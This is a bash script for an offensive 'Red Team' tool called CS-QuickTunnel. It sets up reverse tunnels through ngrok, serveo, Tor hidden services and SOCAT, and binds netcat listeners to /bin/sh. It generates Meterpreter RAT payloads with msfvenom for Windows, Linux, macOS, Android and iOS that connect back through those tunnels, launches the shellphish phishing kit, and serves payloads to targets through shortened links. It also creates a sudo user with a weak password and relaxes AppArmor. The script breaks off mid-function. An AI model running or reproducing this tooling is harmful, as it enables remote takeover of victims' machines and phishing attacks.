CS-QuickTunnel.sh

#!/bin/bash
# CS-QuickTunnel v.0.7.1
# Coded by: Cyber Secrets - Information Warfare Center
# Tool for Red Team ops
# Github: https://github.com/infosecwriter/CS-QuickTunnel
# This script uses some Phishing Pages generated by shellphish Github https://github.com/thelinuxchoice/shellphish
# This script creates a reverse tunnel including SSH, Ngrok, SOCAT, Tor and more that maps back to you locally
# Current shells supported are RAW, NetCat, and Metasploit/Meterpreter
# Current GUI shells supported are VNC and NoMachine

trap 'printf "\n"; stop 1; exit 1' 2
clear
OSType=""

startmenu() {
	banner
	printf "\e[92m  Tunneling...\n"
	printf "  SSH Tunneling                                              =  1\n"
	printf "  NGROK Reverse Tunneling                                    =  2\n"
	printf "  Serveo SSH Reverse Tunneling                               =  3\n"
#	printf "  Localhost.run SSH PHP Reverse Tunneling                    =  4\n"
	if command -v tor > /dev/null 2>&1; then
		printf "  TOR Reverse Tunneling & Hidden Service                     =  9\n"
	fi
	printf "  SOCAT Reverse Tunneling Proxy                              = 10\n"
	printf "  Run Meterpreter reverse tunnels                            = 20\n"
	printf "  Run Shellphish @thelinuxchoice                             = 30\n"
	printf "  Check Dependencies                                         = 90\n"
	printf "  Exit and clean/stop up tunnels and services or CTRL+C      = 98\n"
	printf "  Exit and keep services running                             = 99\n"
	printf "\n"
	read -p $'  Choose an option: \e[37;1m' option
	case $option in
		98) 	stop 1 ;;
		99) 	exit ;;
		1|01) 	banner
			printf "\e[92m  SSH tunneling...\n"
			printf "  SSH Tunneling -L (local proxy to SSH server local address)  =  1\n"
			printf "  SSH Tunneling -L (local proxy to SSH pivot if SSH allows)   =  2\n"
			printf "  SSH Reverse Tunneling -R                                    =  3\n"
			read -p $'  Choose an option: \e[37;1m' optionssh
			case $optionssh in
				1|01) lip; rip; sshme $lport $rserver $rport "-nNT -L" "127.0.0.1"; waitforit ;;
				2|02) lip; rip; read -p $'  Pivot to?' pivit; sshme $lport $rserver $rport "-nNT -L" $pivot; waitforit ;;
				3|03) lip; rip; sshme $rport $rserver $lport "-nNT -R" "127.0.0.1"; waitforit ;;
				*)
			esac
			startmenu
			;;
		2|02) 	ngrokme; menungrok ;; 
		3|03) 	menuserveo ;;
		9|09) 	menutor ;;
		10) 	menusocat ;;
		20) 	menumetasploit ;;
		30)	if [ -d shellphish ]; then cd shellphish; git pull
			else 
				git clone https://github.com/thelinuxchoice/shellphish; cd shellphish	
			fi
			sleep 3
			clear
			bash shellphish.sh
			startmenu
			;;
		90)	printf "\e[93mChecking dependencies"
			apt update | tee -a dep.log
			command -v unzip > /dev/null 2>&1 || { apt install unzip | tee -a dep.log; }
			command -v wget > /dev/null 2>&1 || { apt install wget | tee -a dep.log; }
			command -v curl > /dev/null 2>&1 || { apt install curl | tee -a dep.log; }
			command -v tor > /dev/null 2>&1 || { apt install tor | tee -a dep.log; }
			command -v netcat > /dev/null 2>&1 || { apt install netcat | tee -a dep.log; }
			command -v cryptcat > /dev/null 2>&1 || { apt install cryptcat | tee -a dep.log; }
			command -v php > /dev/null 2>&1 || { apt install php | tee -a dep.log; }
			command -v apparmor-utils > /dev/null 2>&1 || { apt install apparmor-utils | tee -a dep.log; }
			command -v vncserver > /dev/null 2>&1 || { apt install tightvncserver | tee -a dep.log; }
			apt install sshpass
			if [[ -e ngrok ]]; then
				ngrokme
			fi
			printf "\e[93mChecking done.  Review the above logs for potential issues.\n If dependencies are not configured properly, tunnels will NOT work\n\nPress enter when done"
			read depme
			startmenu
			;; 
  		*)
		printf "\e[1;93m [!] Invalid option!\e[0m\n"
		clear
		startmenu
		;;
	esac
}

menussh() {
	printf "\e[92m  Reverse tunnel                                             =  1\n"
	printf "  Run a NetCat listener reverse tunnel                       =  2\n"
	printf "  Run a NetCat listener reverse connect - reverse tunnel     =  3\n"
	printf "  Run a NoMachine listener reverse tunnel                    =  4\n"
	printf "  Run a VNC listener reverse tunnel                          =  5\n"
	printf "  Run PHP HTTP Server through reverse tunnel                 = 10\n"
	printf "  Run Python HTTP Server through reverse tunnel              = 11\n"	
	printf "  Exit                                                       = 99\n"
	printf "\n"
	read -p $'  Choose an option: \e[37;1m' option
}

menungrok() {
	banner
	printf "\e[92m  Ngrok.io...\n"
	menussh
	if [[ $option == 99 ]]; then 
		startmenu
	fi
	case $option in
		1|01)   lip
			printf "\e[1;93m [!] Reverse tunnel from $remote to localhost port $lport\e[0m\n"
			ngrokitforward $lport; menungrok
			;;
		2|02)   lip
			printf "\e[1;93m [!] Starting NetCat Server on port "$lport"!\e[0m\n"
			nc -l -p $lport -e /bin/sh > /dev/null 2>&1 &
			ngrokitforward $lport; menungrok
			;;
		3|03)   lip
			printf "\e[1;93m [!] Starting NetCat Server on port "$lport"!\e[0m\n"
			nc -lvp $lport -e /bin/sh > /dev/null 2>&1 &
			ngrokitforward $lport; menungrok
			;;
		4|04)   lport="4000"
			printf "\e[1;93m [!] Starting Nomachine on port"$lport"!\e[0m\n"
			nomachineme
			ngrokitforward $lport; menungrok
			;;
		5|05)   lip			
			printf "\e[1;93m [!] Starting VNC on port"$lport"!\e[0m\n"
			vncserver -rfbport $lport
			ngrokitforward $lport; menungrok
			;;
		10)     lip; httpserver="servephp"; servengrok $lport; menungrok ;;
		11)     lip; httpserver="servepython"; servengrok $lport; menungrok ;;
		*)
		printf "\e[1;93m [!] Invalid option!\e[0m\n"
		sleep
		clear
		menungrok
		;;
	esac
}

menuserveo() {
	banner
	printf "\e[92m  Serveo.net...\n"
	menussh
	case $option in
		99) 	startmenu ;;
		1|01)   lip; rip
			printf "\e[1;93m [!] Reverse tunnel from $rserver:$rport to localhost:$lport\e[0m\n"
			serveoitforward $lport $rserver $rport
			;;
		2|02)   lip; rip			
			nc -l -p $lport -e /bin/sh > /dev/null 2>&1 &
			serveoitforward $lport $rserver $rport
			;;
		3|03)   lip; rip   
			printf "\e[1;93m [!] Starting NetCat Server on port "$lport"!\e[0m\n"
			nc -lvp -p $lport -e /bin/sh > /dev/null 2>&1 &
			serveoitforward $lport $rserver $rport
			;;
		4|04)   lport="4000"
			printf "\e[1;93m [!] Starting Nomachine on port"$lport"!\e[0m\n"
			nomachineme
			serveoitforward $lport $rserver $rport
			;;
		5|05)   lip; rip
			printf "\e[1;93m [!] Starting VNC on port"$lport"!\e[0m\n"
			vncserver -rfbport $lport
			serveoitforward $lport $rserver $rport
			;;
		10)     lip; rip;  httpserver="servephp"; serveserveo $lport ;;
		11)     lip;  httpserver="servepython"; serveserveo $lport ;;
		*)
		printf "\e[1;93m [!] Invalid option!\e[0m\n"
		sleep
		clear
		banner; menuserveo
		;;
	esac
}


menutor() {
	banner
	printf "\e[92m  Tor Hidden Service - Reverse Tunnel                        =  1\n"
	printf "  Run a NetCat listener reverse tunnels                      =  2\n"
	printf "  Run a NetCat listener reverse conect -  reverse tunnels    =  3\n"
	printf "  Run a NoMachine listener reverse tunnel                    =  4\n"
	printf "  Run a VNC listener reverse tunnel                          =  5\n"
	printf "  Tor Hidden Service - PHP HTTP Server                       = 10\n"
	printf "  Tor Hidden Service - Python HTTP Server                    = 11\n"
	printf "  Show Tor Hidden Service .onion Address                     = 91\n"
	printf "  Add User & Install Tor Browser                             = 92\n"
	printf "  Reset .onion Address                                       = 93\n"
	printf "  Remove User & Tor Browser                                  = 94\n"
	printf "  Exit                                                       = 99\n"
	printf "\n"
	read -p $'  Choose an option: \e[37;1m' option
	printf "\n"
	case $option in
		99) 	startmenu ;;
		1|01) 	lip; toritforward $lport; menutor ;;
		2|02) 	lip; toritforward $lport; printf "\e[1;93m [!] Starting NetCat Server on port "$lport"!\e[0m\n"
			nc -l -p $lport -e /bin/sh > /dev/null 2>&1 &
			menutor
			;;
		3|03)   lip; toritforward $lport; printf "\e[1;93m [!] Starting NetCat Server on port "$lport"!\e[0m\n"
			echo "nc -lvp $lport -e /bin/sh > /dev/null 2>&1 &" nc.sh
			xterm nc.sh
			menutor
			;;
		4|04)   lport="4000"; toritforward $lport; nomachineme; menutor
			;;
		5|05)   lip; printf "\e[1;93m [!] Starting VNC on port"$lport"!\e[0m\n"
			toritforward $lport
			vncserver -rfbport $lport
			menutor
			;;
		10)     lip; httpserver="servephp"; servetor $lport; menutor ;;
		11)     lip; httpserver="servepython"; servetor $lport; menutor ;;
		91)     chown -R debian-tor /var/lib/tor/myservices/
			systemctl restart tor
			if [[ -e /var/lib/tor/myservices/hostname ]]; then
				hostname=$(cat /var/lib/tor/myservices/hostname)
				printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Tor hidden service hostname is: \e[37;1m$hostname\n\n\n"
			else
				printf "\e[91mNo .onion address found\n\n\n"
			fi
			printf "\e[92mPress ENTER to continue"; read me
			menutor
			;;
		92)     systemctl restart tor; torview; menutor
			;;
		93)     printf "\e[93mAre you sure?  This can't be reversed without a backup. UPPER CASE 'Y' to delete: "; read me
			printf $me
			if [[ $me == "Y" ]]; then
				hostname=""
				rm -rf /var/lib/tor/myservices
				systemctl restart tor; sleep 5
			else
				printf "\e[91mNo change to .onion address"; sleep 3	
			fi
			hostname=$(cat /var/lib/tor/myservices/hostname)
			printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Tor hidden service hostname is: \e[37;1m$hostname\n\n\n"; sleep 5
			menutor
			;;
		94)     systemctl stop tor; tordeview; systemctl start tor; menutor	
			;;
		*)	
		printf "\e[1;93m [!] Invalid option!\e[0m\n"
		sleep 1
		clear
		menutor
		;;
	esac
}

menusocat() {
	banner
	printf "\e[92m  SSH Reverse Tunnel Proxy                                   =  1\n"
	printf "  NGROK Reverse Tunnel Proxy                                 =  2\n"
	printf "  Tor Reverse Tunnel Proxy                                   =  3\n"
	printf "  Exit                                                       = 99\n"
	printf "\n"
	read -p $'  Choose an option: \e[37;1m' option
	printf "\n"
	if [[ $option == 99 ]]; then 
		startmenu
	fi
	lip; rfip
	socatitforward $lport $rrserver $rrport
	case $option in
		1|01)	rip;serveoitforward $lport $rserver $rport; menusocat ;;
		2|02)	ngrokitforward $lport; menusocat ;;
		3|03)	toritforward $lport; menusocat ;;
		*)
		printf "\e[1;93m [!] Invalid option!\e[0m\n"
		sleep 1
		clear
		menutor
		;;
	esac
}

menumetasploit() {
	banner
	printf "\e[92m  *** Meterpreter reverse tunnels ***\n"
	printf "  [*] Run through SSH                                        =  1\n"
	printf "  [*] Run through Ngrok                                      =  2\n"
#	printf "  [*] Run through Tor                                        =  3\n"
	printf "  Exit                                                       = 99\n"
	printf "\n"
	read -p $'  Choose an option: \e[37;1m' tunoption
	if [[ $tunoption == 99 ]]; then 
		startmenu
	fi
	case $tunoption in
		1|01)	lip; rip; tunnel="serveoitforward $lport $rserver $rport" ;;
		2|02)	lip; tunnel="ngrokitforward $lport" ;;
		3|03)	lip; tunnel="toritforward $lport" ;;
		*)
		printf "\e[1;93m [!] Invalid option!\e[0m\n"
		sleep 1
		menumetasploit
		;;
	esac
	menupayloads
}

menupayloads() {
	banner
	printf "\e[92m  [*] Windows Meterpreter Reverse TCP Stager                 = 11\n"
	printf "  [*] Windows Meterpreter Windows Reverse HTTP Stager        = 12\n"
	printf "  [*] Windows Meterpreter Windows Reverse HTTPS Stager       = 13\n"
	printf "  [*] Windows Meterpreter Reverse Reverse TCP Stager (IPv6)  = 14\n"
	printf "  [*] Windows Meterpreter Reverse All-Port TCP Stager        = 15\n"
	printf "  [*] Linux Meterpreter Reverse TCP Stager                   = 21\n"
	printf "  [*] Linux Meterpreter Reverse HTTP Inline                  = 22\n"
	printf "  [*] Linux Meterpreter Reverse HTTPS Inline                 = 23\n"
	printf "  [*] Linux Meterpreter Reverse TCP Stager (IPv6)            = 24\n"
	printf "  [*] OSX Meterpreter Reverse TCP Stager                     = 31\n"
	printf "  [*] OSX Meterpreter Reverse HTTP Inline                    = 32\n"
	printf "  [*] OSX Meterpreter Reverse HTTPS Inline                   = 33\n"
	printf "  [*] OSX dup2 Command Shell, Reverse TCP Stager             = 34\n"
	printf "  [*] Android Meterpreter Reverse TCP Stager                 = 41\n"
	printf "  [*] Android Meterpreter Reverse HTTP Stager                = 42\n"
	printf "  [*] Android Meterpreter Reverse HTTPS Stager               = 43\n"
	printf "  [*] Android Meterpreter Reverse TCP Inline                 = 44\n"
	printf "  [*] Apple_iOS Meterpreter Reverse TCP Inline               = 41\n"
	printf "  [*] Apple_iOS Meterpreter Reverse HTTP Inline              = 42\n"
	printf "  [*] Apple_iOS Meterpreter Reverse HTTPS Inline             = 43\n"
	printf "  Exit                                                       = 99\n"
	printf "\n"
	read -p $'  Choose an option: \e[37;1m' option
	case $option in
		99) 	startmenu ;;
		11) 	payload="windows/meterpreter/reverse_tcp"
			platform="-a x86 --platform windows"
			filetype="-f exe"
			fileext="exe"
			OSType="Windows"
			$tunnel
			;;
		12) 	payload="windows/meterpreter/reverse_http"
			platform="-a x86 --platform windows"
			filetype="-f exe"
			fileext="exe"
			OSType="Windows"
			$tunnel
			;;
		13) 	payload="windows/meterpreter/reverse_https"
			platform="-a x86 --platform windows"
			filetype="-f exe"
			fileext="exe"
			OSType="Windows"
			$tunnel
			;;
		14) 	payload="windows/meterpreter/reverse_tcp_allports"
			platform="-a x86 --platform windows"
			filetype="-f exe"
			fileext="exe"
			OSType="Windows"
			$tunnel
			;;
		15) 	payload="windows/meterpreter/reverse_ipv6_tcp"
			platform="-a x86 --platform windows"
			filetype="-f exe"
			fileext="exe"
			OSType="Windows"
			$tunnel
			;;
		21) 	payload="linux/x86/meterpreter/reverse_tcp"
			platform=""
			filetype="-f elf"
			fileext="elf"
			OSType="Linux"
			$tunnel
			;;
		22) 	payload="linux/x86/meterpreter_reverse_http"
			platform=""
			filetype="-f elf"
			fileext="elf"
			OSType="Linux"
			$tunnel
			;;
		23)     payload="linux/x86/meterpreter_reverse_https"
			platform=""
			filetype="-f elf"
			fileext="elf"
			OSType="Linux"
			$tunnel
			;;
		24)     payload="linux/x86/shell/reverse_ipv6_tcp"
			platform=""
			filetype="-f elf"
			fileext="elf"
			OSType="Linux"
			$tunnel
			;;
		31)     payload="osx/x86/shell_reverse_tcp"
			platform=""
			filetype="-f macho"
			fileext="macho"
			OSType="Mac"
			$tunnel
			;;
		32)     payload="osx/x64/meterpreter_reverse_http"
			platform=""
			filetype="-f macho"
			fileext="macho"
			OSType="Mac"
			$tunnel
			;;
		33)     payload="osx/x64/meterpreter_reverse_https"
			platform=""
			filetype="-f macho"
			fileext="macho"
			OSType="Mac"
			$tunnel
			;;
		34)     payload="osx/x64/dupandexecve/reverse_tcp"
			platform=""
			filetype="-f macho"
			fileext="macho"
			OSType="Mac"
			$tunnel
			;;
		41)     payload="android/meterpreter/reverse_tcp"
			platform=""
			filetype="R"
			fileext="apk"
			OSType="Android"
			$tunnel
			;;
		42)     payload="android/meterpreter/reverse_http"
			platform=""
			filetype="R"
			fileext="apk"
			OSType="Android"
			$tunnel
			;;
		43)     payload="android/meterpreter/reverse_https"
			platform=""
			filetype="R"
			fileext="apk"
			OSType="Android"
			$tunnel
			;;
		44)     payload="android/meterpreter_reverse_tcp"
			platform=""
			filetype="R"
			fileext="apk"
			OSType="Android"
			$tunnel
			;;
		51)     payload="apple_ios/aarch64/meterpreter_reverse_tcp"
			platform=""
			filetype="-f macho"
			fileext="macho"
			OSType="Mac"
			$tunnel
			;;
		52)     payload="apple_ios/aarch64/meterpreter_reverse_http"
			platform=""
			filetype="-f macho"
			fileext="macho"
			OSType="Mac"
			$tunnel
			;;
		53)     payload="apple_ios/aarch64/meterpreter_reverse_https"
			platform=""
			filetype="-f macho"
			fileext="macho"
			OSType="Mac"
			$tunnel
			;;
		*)
		startmenu
		;;
	esac
}

lip() {
#	Request local ip listening port
	default_port="12345"
	printf '\e[92m  Choose a local listening port (Example:12345): ' $default_server
	read lport
	lport="${lport:-${default_port}}"
}

rip() {
#	Request remote server info
	default_rserver="serveo.net"
	default_rport="12345"
	printf '\e[92m  Choose a remote server to recieve from (Example:'$default_rserver')\e[37;1m: '
	read rserver
	rserver="${rserver:-${default_rserver}}"
	printf '\e[92m  Choose a remote port to send to (Example:'$default_rport')\e[37;1m: ' 
	read rport
	rport="${rport:-${default_rport}}"
}

rfip() {
#	Request remote server to forward traffic to through pivot
	default_rrserver="towel.blinkenlights.nl"
	default_rrport="23"
	printf '\e[92m  Choose a remote server to forward/pivot to (Example:'$default_rrserver')\e[37;1m: ' $default_rrserver
	read rrserver
	rrserver="${rrserver:-${default_rrserver}}"
	printf '\e[92m  Choose a remote port to forward/pivot to (Example:'$default_rrport')\e[37;1m: ' $default_rrport
	read rrport
	rrport="${rrport:-${default_rrport}}"
}

MetasploitMe() {
#	$1=local IP; $2=remote server; $3=remote IP; $4=payload; $5=filetype $6=file extention (localhost or remote IP)
	read -p $'\e[92mChoose RAT name with ".'$fileext'" extention: ' pname
	printf "\e[1;93m [!] Starting Metasploit Meterpreter ($OSType) listener on port "$1"!\e[0m\n"
	rm -rf reverse-connect.sh
	meterpreter="msfvenom $platform -p $payload LHOST=$rserver LPORT=$rport $filetype -o site/installs/$pname"
	echo 'msfconsole -x "use exploit/multi/handler; set payload '$payload'; set LPORT '$1'; set LHOST 127.0.0.1; run;"' > reverse-connect.sh
	printf "\e[1;93m [!] To create a meterpreter RAT, RUN \n $meterpreter\n"
	printf " \e[92mCopy "$pname" to the remote $OSType system \n Then run "$pname"!\n"
	mkdir site/installs > /dev/null 2>&1
	service postgresql stop > /dev/null 2>&1
	service postgresql start > /dev/null 2>&1
	printf "\e[92mCreating RAT locally, located in the ./site/installs/ folder\n"
	$meterpreter
	chmod +x site/installs/$pname
	chmod +x reverse-connect.sh
	printf "Starting Metasploit with $payload listener...\n"
	xterm ./reverse-connect.sh &
	sleep 10
}

nomachineme() {
#	Download NoMaching
	if [[ -f nomachine_6.3.6_1_amd64.deb ]]; then
		printf ""
	else
		wget https://download.nomachine.com/download/6.3/Linux/nomachine_6.3.6_1_amd64.deb
		sudo dpkg -i nomachine_*_amd64.deb
	fi
}

sshme () {
#	add username to server if needed.  Example: "user@serverip"
#	$1=local IP; $2=remote server; $3=remote IP; $4=parameters for SSH; $5=pivot IP (localhost or remote IP)
	sshconnect="ssh -o StrictHostKeyChecking=no -o CheckHostIP=no $4 $1:$5:$3 $2"
	printf $sshconnect
	$sshconnect
	printf "Connection..."
	waitforit
}

ngrokme() {
#	Download Ngrok
	if [[ -e ngrok ]]; then
		printf "Installed...\n"
	else
		printf "\e[1;92m[\e[0m*\e[1;92m] Downloading Ngrok...\n"
		wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1 
		if [[ -e ngrok-stable-linux-386.zip ]]; then
			unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
			chmod +x ngrok
			rm -rf ngrok-stable-linux-386.zip
		else
			printf "\e[91m[!] Download error... \n"
			exit 1
		fi
	fi
}

torview() {
#	$1=local IP; $2=hostname.onion
# 	Installing Tor browser and testing
	toruser=`cat /etc/passwd | grep -i "kalitor:" | cut -d ":" -f 1`
	if [[ $toruser == "kalitor" ]]; then
		printf "\e[1;93m  User already configured...\n"
	else
		useradd -m kalitor -G sudo -s /bin/bash && echo -e "kalitor\nkalitor\n" | passwd kalitor
		xhost si:localuser:kalitor
	fi
	if [[ -e /home/kalitor/tor-browser_en-US/start-tor-browser.desktop ]]; then
		# Stalling while route is built to Tor2Web
		printf ""
	else
		printf "\e[93m Downloading the Tor Browser for ease of use"
		rm tor-browser-linux64-8.0.3*
		wget https://www.torproject.org/dist/torbrowser/8.0.3/tor-browser-linux64-8.0.3_en-US.tar.xz
		chown kalitor tor-browser-linux64-8.0.3_en-US.tar.xz
		curdir=$(pwd)
		sudo -u kalitor -H tar -xvJf tor-browser-linux64-8.0.3_en-US.tar.xz -C /home/kalitor/
	fi

	timex
	checkphp=$(ps aux | grep -o "php" | head -n1)
	if [[ ! -z "$2" && $checkphp == *'php'* && ! -z "$1" ]]; then
		torhostname=$2:$1
		printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Tor hidden service hostname is: \e[37;1m$2\n\n"
		cd /home/kalitor/tor-browser_en-US/
		printf "\e[93m  Testing the address through the Tor Browser Bundle...\n  Please be patient...\n  This may take a few minutes...\n\n\e[1;92m"
		sudo -u kalitor -H ./start-tor-browser.desktop $torhostname
		cd $curdir
	else
		printf "\e[93m  Launching Tor Browser...\n  Please be patient...\n  This may take a few minutes...\n\n\e[1;92m"
		cd /home/kalitor/tor-browser_en-US/
		sudo -u kalitor -H ./start-tor-browser.desktop https://duckduckgo.com cybersec.tv
		cd $curdir
	fi
}

timex() {
# Simple timer
	tortimex=0
	printf "  Resolving Tor Network... "
	while [ $tortimex != 30 ]
	do
		sleep 1
		printf "|"
		let tortimex++
	done
	printf "\n\n"
}

waitforit() {
#	Just... wait for it...
	printf "\e[92mPress enter to return to main menu or CTRL+C to end session\n"
	read me
}

tordeview() {
# 	Kill user & Un-Installing Tor browser
	killall -u kalitor
	deluser kalitor	
	rm -rf /home/kalitor
}

toritforward() {
#	$1=local IP
	# Reverse tunneling with Tor.  You run the server locally.  We just add the config
	killall tor > /dev/null 2>&1 
	aa-complain system_tor
	printf "\e[1;93m [!] Starting Tor Hidden Server on port "$1"!\e[0m\n"
	if (grep -Fxq "HiddenServiceDir /var/lib/tor/myservices/" /etc/tor/torrc); then
	    sleep 1
	else
	    echo "HiddenServiceDir /var/lib/tor/myservices/" >> /etc/tor/torrc
	fi
	if (grep -Fxq "HiddenServicePort $1 127.0.0.1:$1" /etc/tor/torrc); then
	    sleep 1
	else
	    echo "HiddenServicePort $1 127.0.0.1:$1" >> /etc/tor/torrc
	fi
	sed -i 's/#SocksPolicy\ reject\ \*/SocksPolicy\ accept\ \*/g' /etc/tor/torrc
	killall tor		
	systemctl start tor 
	journalctl -b --no-pager | grep -i tor | tail -n40 | grep -i warn
	sleep 5
	printf "\n\e[92mSetting up Tor hidden service... \n"
	eip="curl ipinfo.io/ip"
	printf "\n\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m]Your external Internet IP address is: \e[37;1m"
	$eip
	tip="torsocks curl ipinfo.io/ip"
	printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m]Your external Torified IP address is: \e[37;1m"
	$tip
	if [[ $eip == $tip ]]; then
		printf "\e[31;1mTOR FAILED.  IPs are the SAME!!!"
		printf "\e[31;1mMake sure your ISP or network isn't blocking Tor.  Press Enter for menu\e[92m"
		read me
	fi	
	hostname=$(cat /var/lib/tor/myservices/hostname)
	printf "Here is the path to fortune: \e[37;1m$hostname:$1\n"
	timex
	if  [[ ! -z "$tunnel" ]]; then
		rserver=$hostname
		rport=$1
		MetasploitMe $1 $rserver $rport
	fi
	if [[ $OSType == "Linux" ]]; then
		read -p $"Would you like to test the Linux RAT? (Y)" testme 
		if [[ $testme == "y" || $testme == "Y" ]]; then
			echo "torsocks ./site/installs/$pname" > testme.sh
			bash testme.sh &
		fi
	else
		printf "\e[1;92m[\e[0m*\e[1;92m] Opening with NetCat to test port \e[0m\e[1;77m %s\e[0m\n"
		echo 'torsocks nc '$hostname $1 > reverse-tor-connect.sh
		chmod +x reverse-tor-connect.sh
		xterm ./reverse-tor-connect.sh &
	fi
	waitforit
}

ngrokitforward() {
#	$1=local IP
	printf "\e[92mStarting NGROK tunnel...\e[0m\n"
	./ngrok tcp $1 > /dev/null 2>&1 &
	sleep 5
	rport=$(curl -s -N http://127.0.0.1:4040/status | grep -o "tcp.ngrok.io:[0-9].\{4\}" | cut -d ":" -f 2) 
	rserver="tcp.ngrok.io"
	printf "\e[1;92m[\e[0m*\e[1;92m] Your new server:\e[0m\e[1;77m %s\e[0m\n" $rserver:$rport
	printf "\e[1;92m[\e[0m*\e[1;92m] Opening with NetCat to test port \e[0m\e[1;77m %s\e[0m\n"
	if  [[ ! -z "$tunnel" ]]; then
		MetasploitMe $1 $rserver $rport
	fi
	if [[ $OSType == "Linux" ]]; then
		read -p $"Would you like to test the Linux RAT? (Y)" testme 
		if [[ $testme == "y" || $testme == "Y" ]]; then
			echo "./site/installs/$pname" > testme.sh
			bash testme.sh &
		fi
	else
		echo 'nc '$rserver $rport > reverse-ngrok-connect.sh
		chmod +x reverse-ngrok-connect.sh
		xterm ./reverse-ngrok-connect.sh &
	fi
	waitforit
}

socatitforward() {
#	$1=local IP; $2=remote server; $3=remote IP
	socat tcp-listen:$1,reuseaddr,fork TCP:$2:$3 &
}

servessh() {
#	$1=local IP; $2=remote server; $3=remote IP
	printf "\e[92mStarting tunnel...\e[0m\n"
	ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R $3:localhost:$1 $2
	waitforit
}

serveoitforward() {
#	$1=local IP; $2=remote server; $3=remote IP
	if  [[ ! -z "$OSType" ]]; then
		MetasploitMe $1 $2 $3
	fi
	if [[ $OSType == "Linux" ]]; then
		read -p $"\nWould you like to test the Linux RAT? (Y)" testme 
		if [[ $testme == "y" || $testme == "Y" ]]; then
			echo "./site/installs/$pname" > testme.sh
			bash testme.sh &
		fi
	else
		printf "\e[1;92m[\e[0m*\e[1;92m] Opening with NetCat to test port \e[0m\e[1;77m %s\e[0m\n"
		echo 'sleep 5; nc '$2 $3 > reverse-ssh-connect.sh
		chmod +x reverse-ssh-connect.sh
		xterm ./reverse-ssh-connect.sh &
	fi
	servessh $1 $2 $3
}

serveserveo() {
#	$1=local IP
	$httpserver $1
	if [[ -e sendlink ]]; then
		rm -rf sendlink
	fi
	$(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:'$1' serveo.net 2> /dev/null > sendlink ' &
	printf "\n"
	sleep 10
	send_link=$(grep -o "https://[0-9a-z]*\.serveo.net" sendlink)
	printf '\e[1;93m[\e[0m\e[1;77m*\e[0m\e[1;93m] Send the direct link to target:\e[0m\e[1;77m %s \n\n' $send_link
	tinyurl $send_link
	firefox $send_link $send_link/installs.php
	read me
	menuserveo
}

servephp() {
#	$1=local IP
	printf "\e[1;92m[\e[0m*\e[1;92m] Starting local PHP HTTP server on port \e[97m\e[5m$1 \e[25m...\n"
	mkdir PHPHTTP > /dev/null 2>&1 &
	cp -r site/*.* PHPHTTP/
	cd PHPHTTP && php -S 127.0.0.1:$1 > /dev/null 2>&1 & 
	sleep 2
}

servepython() {
#	$1=local IP
	printf "\e[1;92m[\e[0m*\e[1;92m] Starting local Python HTTP server on port \e[97m\e[5m$1 \e[25m...\n"
	mkdir PythonHTTP > /dev/null 2>&1 &
	cp -r site/installs/*.* PythonHTTP/
	cd PythonHTTP && python -m SimpleHTTPServer $1 > /dev/null 2>&1 & 
	sleep 2
}

servengrok() {
#	$1=local IP
	ngrokme
	$httpserver $1
	printf "\e[1;92m[\e[0m*\e[1;92m]Starting ngrok server...\n"
	./ngrok http $1 > /dev/null 2>&1 &
	sleep 5
	link=$(curl -s -N http://127.0.0.1:4040/status | grep -o "https://[0-9a-z]*\.ngrok.io")
	printf "\e[1;92m[\e[0m*\e[1;92m] Congrats!!!  Your new server: \e[37;1m$link\n" 
	printf "\e[1;92m[\e[0m*\e[1;92m]Opening with Firefox in 3 seconds\n"
	sleep 3 
	firefox $link
	waitforit
}

servetor() {
#	$1=local IP
	printf "\e[1;93m"
	aa-complain system_tor
	systemctl restart apparmor
	systemctl restart tor
	$httpserver $1
	printf "\e[1;92m[\e[0m*\e[1;92m] Setting up Tor hidden service... \n"
	if (grep -Fxq "HTTPTunnelPort 0.0.0.0:9080" /etc/tor/torrc); then
	    	sleep 1
	else
	    	echo "HTTPTunnelPort 0.0.0.0:9080" >> /etc/tor/torrc
	fi
	if (grep -Fxq "HiddenServiceDir /var/lib/tor/myservices/" /etc/tor/torrc); then
	    	sleep 1
	else
	    	echo "HiddenServiceDir /var/lib/tor/myservices/" >> /etc/tor/torrc
	fi
	if (grep -Fxq "HiddenServicePort $1 127.0.0.1:$1" /etc/tor/torrc); then
	    	sleep 1
	else
	    	echo "HiddenServicePort $1 127.0.0.1:$1" >> /etc/tor/torrc
		printf "\e[1;92m[\e[0m*\e[1;92m] Adding HiddenServicePort $1 to Tor Config...\n"
	fi
	sed -i 's/#SocksPolicy\ reject\ \*/SocksPolicy\ accept\ \*/g' /etc/tor/torrc
	printf "\e[1;92m[\e[0m*\e[1;92m] Restarting Tor for new Tor hidden service... \n"
	killall tor		
	systemctl restart tor 
	sleep 10
	journalctl -b --no-pager | grep -i tor | tail -n40 | grep -i warn
	eip="curl ipinfo.io/ip"
	printf "\n\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Your external Internet IP address is: \e[37;1m"; $eip
	tip="torsocks curl ipinfo.io/ip"
	printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Your external Torified IP address is: \e[37;1m"; $tip
	if [[ $eip == $tip ]]; then
		printf "\e[91mTOR FAILED.  IPs are the SAME!!!"
		printf "\e[91mMake sure your ISP or network isn't blocking Tor.  Press Enter for menu\e[92m"
		read me
		menutor
	fi
	hostname=$(cat /var/lib/tor/myservices/hostname)
	torview $1 $hostname
	printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Tor hidden service hostname is: $hostname\n\n"
	printf "\e[1;92m[\e[0m*\e[1;92m] You can connect to your new PHP Webserver using: \n    \e[37;1m> http://$hostname:$1 throught Tor\n\n\e[92m"
	printf "\e[1;92m[\e[0m*\e[1;92m] You can connect to your new PHP Webserver using: \n    \e[37;1m> http://$hostname.to:$1 throught the Internet\n\n\e[92m"
	printf "If the page doesn't load, wait a minute and try again...\n\n"
	waitforit
}

tinyurl () {
#	$1=URL to convert
	tiny=$(curl -s http://tinyurl.com/api-create.php?url=$1 | head -n1)
